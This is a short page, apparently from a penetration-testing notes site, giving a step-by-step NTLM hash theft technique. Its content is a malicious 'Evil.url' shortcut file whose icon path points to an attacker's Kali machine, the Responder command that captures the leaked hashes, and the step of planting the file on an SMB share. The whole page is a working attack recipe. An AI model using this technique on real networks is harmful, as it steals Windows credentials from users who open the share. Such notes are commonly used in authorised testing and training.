NTLM Theft

1

Create a file called "Evil.url"

[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\<Kali IP Address>\%USERNAME%.icon
IconIndex=1
2

Start Responder

sudo responder -I <Interface Name> -wv
3

Put Evil.url on SMB share

put Evil.url
4

Stolen NTLM appeared on Responder

PreviousWeb AttackNextEnumeration

Last updated